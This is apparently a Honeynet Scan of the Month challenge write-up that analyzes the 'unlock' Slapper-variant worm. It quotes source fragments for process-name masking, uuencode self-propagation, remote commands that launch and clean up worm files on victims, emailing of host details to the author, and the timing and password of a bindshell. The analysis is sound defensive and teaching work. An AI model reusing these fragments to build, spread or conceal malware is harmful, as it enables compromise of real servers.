The Challenge: Members from the Honeynet.BR team have captured a new worm from the wild. The file (.unlock), was used by the worm to infect the honeypot. Your mission is to analyze the captured file in order to answer the questions below. Be sure you review the submission rules at the SotM challenge page before submitting your results. Download the Binary Note: The MD5 and SHA1 checksums are shown below. MD5 (.unlock) = a03b5be9264651ab30f2223592befb42 $ md5sum .unlock a03b5be9264651ab30f2223592befb42 .unlock Questions and Answers: ---------------------- 1. Which is the type of the .unlock file? When was it generated? $ file .unlock .unlock: gzip compressed data, from Unix $ mv .unlock unlock.gz;gzip -d -v unlock.gz unlock.gz: 78.0% -- replaced with unlock $ ls -l unlock;file unlock -rw-r----- 1 user user 81920 Sep 22 17:06 unlock unlock: GNU tar archive Have a look in the tar, then extract: $ tar -tvf unlock -rw-r--r-- root/wheel 70981 2002-09-20 13:28 .unlock.c -rw-r--r-- root/wheel 2792 2002-09-19 21:57 .update.c So, .unlock is simply a renamed gzip compressed tar file. 2. Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1? contem@efnet initially modified this worm (from the apache worm, the source was then modified by aion (aion@ukr.net) As part of the code he as amended the date define, see below: #define VERSION 20092002 So yes, the two date stamps collaborate. 3. Which process name is used by the worm when it is running? The new author, aion has attempted to mask the original process name with the small addition of code below. All this does is replaces the arguments (and original filename) in the process list with NULL, and then copies the previously declared "PSNAME" to argv[0]. line 78: #define PSNAME "httpd " line 1803: for(a=0;argv[0][a]!=0;a++) argv[0][a]=0; line 1804: for(a=0;argv[1][a]!=0;a++) argv[1][a]=0; line 1805: strcpy(argv[0],PSNAME); 4. In which format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine? The way the worm propagates has not been modified from the original worm. In the excerpt of code below you can see the worm encodes the in the same way 'uuencode' works. This function encodes the binary (in this case the compressed tar file) into ASCII. line 1194: int encode(int a) { line 1195: register int ch, n; line 1196: register char *p; line 1197: char buf[80]; line 1198: FILE *in; line 1199: if ((in=fopen(WORMSRC,"r")) == NULL) return 0; line 1200: writem(a,UUHEAD); line 1201: while ((n = fread(buf, 1, 45, in))) { line 1202: ch = ENC(n); line 1203: if (sendch(a,ch) <= ASUCCESS) break; line 1204: for (p = buf; n > 0; n -= 3, p += 3) { line 1205: if (n < 3) { line 1206: p[2] = '\0'; line 1207: if (n < 2) p[1] = '\0'; line 1208: } line 1209: ch = *p >> 2; line 1210: ch = ENC(ch); line 1211: if (sendch(a,ch) <= ASUCCESS) break; line 1212: ch = ((*p << 4) & 060) | ((p[1] >> 4) & 017); line 1213: ch = ENC(ch); line 1214: if (sendch(a,ch) <= ASUCCESS) break; line 1215: ch = ((p[1] << 2) & 074) | ((p[2] >> 6) & 03); line 1216: ch = ENC(ch); line 1217: if (sendch(a,ch) <= ASUCCESS) break; line 1218: ch = p[2] & 077; line 1219: ch = ENC(ch); line 1220: if (sendch(a,ch) <= ASUCCESS) break; line 1221: } line 1222: ch='\n'; line 1223: if (sendch(a,ch) <= ASUCCESS) break; line 1224: usleep(10); line 1225: } line 1226: if (ferror(in)) { line 1227: fclose(in); line 1228: return 0; line 1229: } line 1230: ch = ENC('\0'); line 1231: sendch(a,ch); line 1232: ch = '\n'; line 1233: sendch(a,ch); line 1234: writem(a,"end\n"); line 1235: if (in) fclose(in); line 1236: return 1; line 1237: } Below is the code which is executed after the propagation, the cleaning step: 1427: writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c " 1428: " /tmp/httpd /tmp/update; exit; \n"); Which leaves only /tmp/.unlock. Which is the compressed tar file we are investigating. 5. Which port is scanned by the worm? As shown in the portion below, the definition is for port 80. line 67:#define SCANPORT 80 This is used in the function atcp_sync_connect() which is called from line 1923 in main(). The protocol is as suggested, TCP. This is confirmed in the 5th line of the atcp_sync_connect() function. line 448: if ((inst->sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { 6. Which vulnerability the worm tries to exploit? In which architectures? The Worm is based on the Linux slapper worm [1]. Which takes advantage of the buffer overflow vulnerability affecting SSLv2-enabled OpenSSL 0.9.6d and earlier installations of Apache webserver. [2] This can provide remote unprivileged shell access. The architecture affected is only intel/x86. 7. What kind of information is sent by the worm by email? To which account? The information is sent to the email address as defined on line 77. line 77:#define MAILTO "aion@ukr.net" The details sent to the address are: 1) The hostid of the machine. 2) The currently assigned hostname of the machine obtained from gethostname() 3) The IP address of the machine currently infecting. line 113: gethostname(buffer,128); line 122: sprintf(cmdbuf," hostid: %d \r\n" line 123: " hostname: %s \r\n" line 124: " att_from: %s \r\n",gethostid(),buffer,sip); 'sip' is defined at the beginning of the mailme() function as a pointer: line 94:int mailme(char *sip) The mailme() function is called from main(): line 1802: mailme(argv[1]); zhdr(0); And argv[1], the first argument given to the program is the IP address of currently infected machine. This is shown in the portion of code below, this shows the steps after the currently infected machine infects another. It launches the worm (on the newly infected machine) with the IP address of machine currently infecting. This is to continue the P2P network that is created. line 1425: sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip); line 1426: writem(sockfd,rcv); sleep(3); 8. Which port (and protocol) is used by the worm to communicate to other infected machines? The worm communicates through the User Datagram Protocol (UDP), on port 4156. The port is defined below: line 66:#define PORT 4156 After the daemon is launched, the worm sets up the local port to listen on 4156/udp so that other worms can communicate with it: from main() line 1781: if (audp_listen(&udpserver,PORT) != 0) { line 1782: printf("Error: %s\n",aerror(&udpserver)); line 1783: return 0; line 1784: } line 589:int audp_listen(struct ainst *inst,unsigned int port) { .. line 592: if ((inst->sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) { 9. Name 3 functionalities built in the worm to attack other networks. There are four denial of service attacks built into the worm they are as follows: 1) A non blocking UDP flood, with packets less than 9216 bytes in size. Destination port is definable to be random or static. 2) A non blocking TCP connect() flood. Options include a random or definable destination port. 3) A non blocking IPv6 TCP connect() flood. Again, optional destination port. 4) And UDP based DNS flood. All of these attacks are called from the main() loop. Since the worm is not, and does not make any attempt to obtain root privileges these DoS attacks do not have their source addresses forged. 10. What is the purpose of the .update.c program? Which port does it use? .update.c is a very simple shell on a port program. It listens on port 1052/tcp for connections. This program also attempts to mask its process name, but this time it uses the definition 'update '. line 8:#define PSNAME "update " // what copy to argv[0] line 34: for(retval=0;argv[0][retval]!=0;retval++) argv[0][retval]=0; line 35: strcpy(argv[0],PSNAME); Upon connecting to port 1052, if you supply the password if "aion1981" then you will get an interactive shell. 11. Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program? These values are to attempt to make the bindshell a little less obvious. What happens is the bindshell opens the port for 10 seconds, closes it and then sleeps for 300 seconds (5 minutes). I can only assume that this is so if the administrator has scheduled network scans (or the like) the chances of him hitting the open port in that 10 second time frame is limited. Although this goes both ways, how would the attacker actually know the bindshell is running without connecting every 10seconds for 5minutes? line 6:#define SLEEPTIME 300 // sleep 5 min. line 7:#define UPTIME 10 // listen 10 sec. line 52: for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);) .. line 70: } line 71: line 72: closeall(); line 73: sleep(SLEEPTIME); [1]. http://www.cert.org/advisories/CA-2002-27.html [2]. http://www.kb.cert.org/vuls/id/102795 [3]. http://packetstormsecurity.org/distributed/pud.tgz - Original DDoS Daemon code. [4]. http://packetstormsecurity.org/worms/apache-worm.c - Original Apache worm for the chunked vulnerability against FreeBSD.